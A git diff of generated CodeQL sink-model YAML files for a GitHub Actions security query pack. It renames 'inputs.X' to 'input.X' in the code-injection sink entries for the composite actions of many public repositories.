b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 470109b5e857..b985d87f7e19 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 5ffefd58e53f..8e7cdd0308c9 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 742e1876811b..cf30d0d19ccc 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 97c75ae6f5c9..5414a755179c 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index fa98e84315df..97a3bfa026e1 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 3bc48b644d00..81672e855578 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] - - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index 81e079430266..b4fdfaf273df 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] - - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index a1fdb476748e..6f1043073d8e 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 5744f3e74956..f9244c448580 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 852e39799d93..36332c5678d4 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index a0d7eb51354e..c246e5de06f6 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 8d10d22cd5c0..13c0093fe4ac 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["department-of-veterans-affairs/vets-website", "*", "inputs.delimiter", "code-injection", "generated"] \ No newline at end of file + - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index c99c630853e3..49b226de1e80 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml +++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["devexpress/devextreme", "*", "inputs.name", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.result", "code-injection", "generated"] - - ["devexpress/devextreme", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.result", "code-injection", "generated"] + - ["devexpress/devextreme", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8554ebec65fa..9a6e0b88ba2c 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diggerhq/digger", "*", "inputs.checkov-version", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-auth-credentials", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-workload-identity-provider", "code-injection", "generated"] - - ["diggerhq/digger", "*", "inputs.google-service-account", "code-injection", "generated"] \ No newline at end of file + - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-auth-credentials", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-workload-identity-provider", "code-injection", "generated"] + - ["diggerhq/digger", "*", "input.google-service-account", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index 6f0878a77cbd..4f88855a5616 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["diku-dk/futhark", "*", "inputs.script", "code-injection", "generated"] - - ["diku-dk/futhark", "*", "inputs.slurm-options", "code-injection", "generated"] \ No newline at end of file + - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] + - ["diku-dk/futhark", "*", "input.slurm-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 198109f790c1..5683d28567f4 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["discourse/.github", "*", "inputs.about_json_path", "code-injection", "generated"] \ No newline at end of file + - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index e634eaa38a2c..424c7241bcfc 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dnsjava/dnsjava", "*", "inputs.name", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.filename", "code-injection", "generated"] - - ["dnsjava/dnsjava", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.filename", "code-injection", "generated"] + - ["dnsjava/dnsjava", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index e26ba9755d04..37295f2cf6c0 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotintent/react-native-ble-plx", "*", "inputs.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 2cda1936f016..e7c767d2dce1 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/docs-tools", "*", "inputs.support", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index f83cf533944e..7f78690f6396 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dotnet/dotnet-monitor", "*", "inputs.files_to_commit", "code-injection", "generated"] \ No newline at end of file + - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index 5af04ac6ac70..ba1beace1704 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["dragonflydb/dragonfly", "*", "inputs.gspace-secret", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.filter", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.dfly-executable", "code-injection", "generated"] - - ["dragonflydb/dragonfly", "*", "inputs.build-folder-name", "code-injection", "generated"] \ No newline at end of file + - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.dfly-executable", "code-injection", "generated"] + - ["dragonflydb/dragonfly", "*", "input.build-folder-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 0d0cae87e09d..d6ee6c8bb7d2 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eksctl-io/eksctl", "*", "inputs.token", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.email", "code-injection", "generated"] - - ["eksctl-io/eksctl", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] + - ["eksctl-io/eksctl", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 070b502e1889..83951f43c635 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-dotnet", "*", "inputs.project", "code-injection", "generated"] - - ["elastic/apm-agent-dotnet", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] + - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 6c0cf90523ac..397ab0838090 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elastic/apm-agent-java", "*", "inputs.tag", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.path", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.name", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.test-java-version", "code-injection", "generated"] - - ["elastic/apm-agent-java", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.name", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.test-java-version", "code-injection", "generated"] + - ["elastic/apm-agent-java", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index ca6459221d4b..5dd069df4990 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["elementor/elementor", "*", "inputs.README_TXT_PATH", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.CHANNEL", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PACKAGE_VERSION", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.MESSAGE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_TOKEN", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.SLACK_CHANNELS", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.PRERELEASE", "code-injection", "generated"] - - ["elementor/elementor", "*", "inputs.TAG_NAME", "code-injection", "generated"] \ No newline at end of file + - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PACKAGE_VERSION", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.MESSAGE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_TOKEN", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.SLACK_CHANNELS", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.PRERELEASE", "code-injection", "generated"] + - ["elementor/elementor", "*", "input.TAG_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 79d14b65bccc..1a1d763d6e4a 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emberjs/data", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file + - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 69771693787d..a8e95d304576 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["emqx/emqx", "*", "inputs.profile", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.otp", "code-injection", "generated"] - - ["emqx/emqx", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] + - ["emqx/emqx", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index a5a3cfbb1c99..52d085ee4798 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["eonasdan/tempus-dominus", "*", "inputs.VERSION", "code-injection", "generated"] - - ["eonasdan/tempus-dominus", "*", "inputs.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file + - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] + - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 2000f5d9d00c..33c56a67cb9b 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["erlang/otp", "*", "inputs.TYPE", "code-injection", "generated"] - - ["erlang/otp", "*", "inputs.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file + - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] + - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 95164c659ed5..258101eecea4 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] - - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 7e3b5e4caf60..d77e05c680bc 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] - - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file + - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "input.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", 